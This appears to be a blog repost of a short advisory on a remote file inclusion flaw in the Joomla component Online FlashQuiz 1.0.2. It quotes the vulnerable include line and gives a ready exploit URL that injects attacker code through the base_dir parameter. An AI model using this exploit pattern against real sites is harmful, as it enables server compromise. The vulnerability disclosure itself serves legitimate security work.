LFI to RCE via access_log injection

on
18

Online FlashQuiz 1.0.2 - RFI

on 

[o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Software : com_onlineflashquiz version 1.0.2 - paid component
Vendor   : www.elearningforce.biz
Author   : NoGe


[o] Vulnerable file
component/com_onlineflashquiz/quiz/common/db_config.inc.php
include_once($base_dir."common/classes/DBBase.class.php");


[o] Exploit
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode]


[o] Publish
http://milw0rm.com/exploits/5345


Comments

labatterie said…
I find the information I need.
December 2, 2010 at 9:04 PM
Post a Comment